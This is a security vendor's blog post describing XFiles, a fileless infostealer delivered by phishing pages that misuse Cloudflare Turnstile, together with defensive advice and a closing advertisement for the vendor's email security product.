XFiles: A Fileless Malware Delivered via Phishing Campaigns

No files, no installs, no alerts. Just a single click on the wrong link is all it takes to unlock access to your inbox, your files, and your entire cloud workspace.

In a recent discovery on a cybercrime forum, Abnormal Security researchers identified a new type of malware strain called XFiles, a fileless toolkit designed to compromise both individual and corporate environments.

Delivered via phishing emails, XFiles uses a malicious link or HTML attachment to redirect targets to a malicious landing page to execute the fileless payload. Even more nefarious? The landing page includes a Cloudflare Turnstile, a legitimate verification widget repurposed as a social engineering tool to create a false sense of trust.

This discovery underscores a troubling trend: threat actors are getting more creative, making attack detection more difficult by the day.

Unlike traditional malware, fileless malware doesn’t rely on executable files to infect a system. Instead, it operates entirely in memory, often using legitimate system tools and processes to deliver its payload. This approach eliminates the need to write files to disk, effectively bypassing many signature-based detection mechanisms and leaving little to no trace behind.

XFiles is a prime example of this evolving threat category. It builds on the fileless model by executing entirely in memory, significantly reducing its forensic footprint while maximizing its ability to remain undetected.

The malware is capable of exfiltrating data from more than 50 popular platforms, including corporate collaboration tools like Slack and Discord, as well as productivity solutions like Google Workspace. XFiles has also been optimized to target cryptocurrency wallets, with support for over 800 wallet types, enabling attackers to harvest private keys and seed phrases.

What makes XFiles especially dangerous is its ability to steal and misuse Google account tokens, allowing attackers to impersonate users and access services like Gmail, Google Drive, and other cloud platforms. This poses a serious risk to businesses that rely on Google Workspace for real-time collaboration, productivity, and centralized document management.

By recovering these tokens, attackers can effectively bypass multi-factor authentication (MFA) and gain unauthorized access to sensitive corporate accounts, potentially exposing sensitive communications, internal documents, shared drives, calendars, and other critical assets.

Compounding this threat, the malware is equipped with advanced surveillance tools, including a hidden virtual network computing (HVNC) module—a stealthy version of virtual network computing (VNC)—that enables attackers to remotely monitor and control targets’ systems without their knowledge.

The attack chain begins with a phishing email, typically disguised as legitimate communication from a trusted service or business partner. These emails often contain links that redirect targets to a malicious landing page.

On the landing page, attackers use the Cloudflare Turnstile user verification widget as a clever social engineering tactic to create a false sense of security and legitimacy. Because Turnstile is a legitimate service associated with Cloudflare—a well-known provider of web infrastructure and security—its presence can lead targets to believe the site is safe and trustworthy. Once the target completes the verification, they are presented with a “Download” button that triggers the delivery of the malware’s fileless payload.

XFiles’ credential-theft capabilities are extensive, targeting browser-stored passwords and cookies, corporate and personal collaboration tools, and even desktop authenticator applications to intercept MFA or one-time passwords (OTPs).

For businesses, compromised collaboration tools like Slack and Discord present significant risks. Attackers can use these platforms to impersonate employees, launch additional malware attacks, and steal important data.

Staying ahead of threats like XFiles requires more than basic security. These strategies can help close the gaps:

• Disable browser-based credential storage wherever possible. Storing passwords in browsers increases the risk of credential theft, especially from malware designed to extract stored data. Encourage employees to use enterprise-grade password managers instead.

• Use hardware wallets for crypto assets. For individuals and organizations managing cryptocurrency, storing private keys offline in hardware wallets significantly reduces the risk of theft via malware-based attacks.

• Restrict access to collaboration tools and cloud services. Regularly audit permissions to ensure that only authorized users can access sensitive systems and data, minimizing the impact of any potential compromise.

• Train employees to spot and report phishing attempts. Ongoing security awareness training empowers employees to serve as an early warning system. Teaching users how to identify suspicious emails can stop attacks before they escalate.

• Deploy endpoint protection to detect fileless malware. Implement endpoint detection and response (EDR) solutions—such as those from CrowdStrike—to monitor for unusual activity, detect proxy-layer communication, and contain attacks at the device level.

• Invest in an advanced email security platform. As the first line of defense, email security plays a critical role in preventing attacks from ever reaching users. Innovative solutions leverage AI to detect and block emails with malicious links or attachments before employees can engage.

When layered together, these security measures create a strong foundation to help limit exposure and reduce the likelihood of a successful compromise.

The stealth and lack of persistence that define fileless malware not only make it harder to detect and remove but also increasingly attractive to cybercriminals—especially those targeting cloud environments. The emergence of threats like XFiles reinforces just how critical it is to have advanced email security, especially as attackers grow more sophisticated in their techniques.

Abnormal Security’s AI-native platform is purpose-built to detect and stop even the most elusive threats, including fileless malware delivered via phishing emails. By analyzing thousands of behavioral signals across every message, Abnormal prevents attacks before they ever reach employees—keeping your organization protected from today’s most advanced email threats.

See for yourself how Abnormal AI provides comprehensive email protection against attacks that exploit human behavior. Schedule a demo today.